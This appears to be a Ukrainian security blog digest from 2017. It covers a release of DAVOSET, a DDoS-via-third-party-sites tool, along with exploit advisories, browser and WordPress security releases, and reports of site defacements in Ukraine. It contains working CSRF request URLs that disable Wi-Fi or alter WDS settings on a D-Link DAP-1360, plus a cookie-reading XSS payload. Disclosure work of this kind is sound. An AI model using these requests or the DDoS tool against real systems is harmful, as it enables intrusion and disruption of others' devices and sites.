Websecurity - Веб безпека

В березні, 09.03.2017, вийшла нова версія програми DAVOSET v.1.3. В новій версії:

• Розширив підтримку SSRF і додав підтримку XXE уразливості в SAP NetWeaver AS.
• Додав нові сервіси в повний список зомбі.
• Прибрав неробочі сервіси з повного списку зомбі.

Всього в списку міститься 170 зомбі-сервісів.

DDoS attacks via other sites execution tool (DAVOSET) - це інструмент для використання Abuse of Functionality та XML External Entities уразливостей на одних сайтах, для проведення DoS і DDoS атак на інші сайти.

Скачати: DAVOSET_v.1.3.rar.

Виявлені численні уразливості безпеки в Mozilla Firefox і Thunderbird.

Уразливі продукти: Mozilla Firefox 51, Firefox ESR 45.7, Thunderbird 45.7.

Пошкодження пам’яті, обхід обмежень, вибивання, підробка адресного рядку, витік інформації, видалення довільних файлів на комп’ютері, підробка Print preview, DoS атаки на браузер, подібні до тих, про які я писав багато років тому.

• MFSA 2017-05 Security vulnerabilities fixed in Firefox 52 (деталі)

В даній добірці експлоіти в веб додатках:

• GSX Analyzer 10.12 / 11 - ‘main.swf’ Hard-Coded Superadmin Credentials (деталі)
• Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure (деталі)
• Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting (деталі)
• Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Authenticated Remote Command Execution (Metasploit) (деталі)
• Iris ID IrisAccess iCAM4000/iCAM7000 - Hard-Coded Credentials Remote Shell Access (деталі)

Продовжуючи тему уразливостей в D-Link DAP-1360. У січні, 27.01.2016, я виявив нові уразливості в пристрої. Це Predictable Resource Location та Cross-Site Request Forgery уразливості в D-Link DAP-1360 (Wi-Fi Access Point and Router).

Predictable Resource Location (WASC-34):

Якщо використовувати D-Link DAP-1360 в якості роутера, до можливий доступ до адмінки за адресою http://dlink.ap. Дана адреса застосовується в різних пристроях D-Link з функцією роутера. Це полегшує CSRF та XSS атаки - всі, про які писав в цій та попередніх публікаціях. Бо зміна IP вже не захистить і можна віддалено проводити CSRF атаки використовуючи ім’я домену.

CSRF (WASC-09):

Зокрема можна вимкнути Wi-Fi. При цьому зміна IP з дефолтного 192.168.0.50 на іншій не допоможе.

http://dlink.ap/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:false,%22mbssidNum%22:1,%22mbssidCur%22:1}

CSRF (WASC-09):

В розділі Wi-Fi - WDS можна змінити параметр WDS Mode:

Вимкнути - Disable:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=109&res_struct_size=0&res_buf={%22wds%22:{%22WdsEnable%22:%220%22}}

Увімкнути - Bridge mode:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=109&res_struct_size=0&res_buf={%22wds%22:{%22WdsEnable%22:%222%22,%22WdsPhyMode%22:%22CCK%22,%22WdsEncrypType%22:%22WEP%22,%22WdsKey%22:%22wfkey%22,%22Wds1Mac%22:%22%22,%22Wds2Mac%22:%22%22,%22Wds3Mac%22:%22%22,%22Wds4Mac%22:%22%22}}

Увімкнути - Repeater mode:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=109&res_struct_size=0&res_buf={%22wds%22:{%22WdsEnable%22:%223%22,%22WdsPhyMode%22:%22CCK%22,%22WdsEncrypType%22:%22WEP%22,%22WdsKey%22:%22wfkey%22,%22Wds1Mac%22:%22%22,%22Wds2Mac%22:%22%22,%22Wds3Mac%22:%22%22,%22Wds4Mac%22:%22%22}}

Уразлива версія D-Link DAP-1360, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.

Після виходу Firefox 51 в січні також вийшли версії 51.0.1 і 51.0.2 з виправленням багів.

У лютому, 09.02.2017, вийшов Mozilla Firefox 51.0.3. Нова версія браузера вийшла через пів місяця після виходу Firefox 51. Вона вийшла лише для Android.

Це секюріті випуск в якому виправлена уразливість CVE-2017-5397: Firefox for Android cache directory is world writable.

• MFSA 2017-04 Security vulnerabilities fixed in Firefox 51.0.3 (деталі)

В період з 10.09.2015 по 09.03.2017 відбувся новий масовий взлом сайтів на сервері Freehost. Шостий масовий взлом сайтів на сервері Freehost відбувся раніше.

Був взломаний сервер української компанії Freehost. Взлом складався з одного масового дефейсу та кількох невеликих дефейсів сайтів. Дефейси відбулися після взлому сайтів на іншому вищезгаданому сервері цієї компанії.

Всього було взломано 44 сайти на сервері хостера Freehost (IP 178.20.153.90). Перелік сайтів можете подивитися на www.zone-h.org. Серед них український державний сайт www.ivanrda.gov.ua.

З зазначених 44 сайтів 34 сайти були взломані хакерами Spyhackerz та інші сайти іншими хакерами.

Масовий дефейс хакерами Spyhackerz явно був зроблений через взлом серверу хостінг провайдера. Коли через взлом одного сайта, був отриманий root доступ до сервера (через уразливості в програмному забезпеченні самого сервера) та атаковані інші сайти на даному сервері. У випадку інших дефейсів сайтів, всі вони явно були зроблені при взломах окремих сайтів.

В даній добірці уразливості в веб додатках:

• Outlook.com for Android fails to validate server certificates (деталі)
• Mailman vulnerability (деталі)
• WSO2 Identity Server multiple vulnerabilities (деталі)
• Manage Engine Desktop Central 9 - Unauthorised administrative password reset (деталі)
• HP Service Manager, Multiple Vulnerabilities (деталі)

Ще 23.02.2007 я знайшов Cross-Site Scripting та Information Leakage уразливості на сайтах stat24.meta.ua. Як я вже розповідав, після останнього разу, коли вони відповіли мені дуже несерйозним чином, я більше не сповіщаю Мету про дірки на їхніх сайтах.

Останнього разу стосовно проектів компанії Мета я писав про уразливості на blog.meta.ua та market.auto.meta.ua.

XSS:

• alert(document.cookie)

Information Leakage:

На деяких сторінках сайту були розміщені логіни та хеші паролів користувачів, що були доступні всім без авторизації.

Уразливості вже виправлені, але вони зробили це лише через багато років. І це є типовим явищем для сайтів Мети, що добре видно з тих багатьох дірок на багатьох сайтах Мети про які я розповідав раніше.

Раніше я писав про січневі DDoS атаки та взломи в Україні, а зараз розповім про ситуацію лютому.

В зв’язку з сепаратистськими і терористичними акціями на сході України хакерська активність була значною. Відбулися наступні DDoS атаки та взломи в Інтернеті.

Іноземні хакери провели неполітичні взломи державних сайтів:

mediarnbo.org (хакером GeNErAL) - 08.02.2017
zhmrada.gov.ua (хакером RxR) - 21.02.2017
khoas.gov.ua (хакером RxR) - 21.02.2017
www.korc.gov.ua (хакерами з Tsunami Faction) - 25.02.2017

Проукраїнськими хакерами були атаковані наступні сайти:

Українські Кібер Війська взломали сайт politrussia.com - 05.02.2017
Лютневі DDoS атаки на сайти ДНР і ЛНР

Сайти ДНР і ЛНР були атаковані неодноразово на протязі місяця.

Українські Кібер Війська закрили наступні сайти:

Закритий сайт ukrobaza.ru (через вплив на хостера) - 02.2017

У січні, 26.01.2017, вийшла нова версія WordPress 4.7.2.

WordPress 4.7.2 це секюріті випуск нової 4.7 серії. В якому розробники виправили 4 уразливості. Це SQL injection уразливість, до якої сам WP не вразливий, але атака може відбуватися через плагіни і теми, тому розробники виправили її для надійності. А також можливість додавати терміни таксономії користувачам без відповідних прав, XSS, підняття привілеїв в REST API.

Також в цей день вийшли WordPress 4.0.15, 4.1.15, 4.2.12, 4.3.7, 4.4.7, 4.5.6 і 4.6.3. Вказані версії це секюріті випуски 4.0, 4.1, 4.2, 4.3, 4.4, 4.5 і 4.6 серії, в яких виправлені дані уразливості.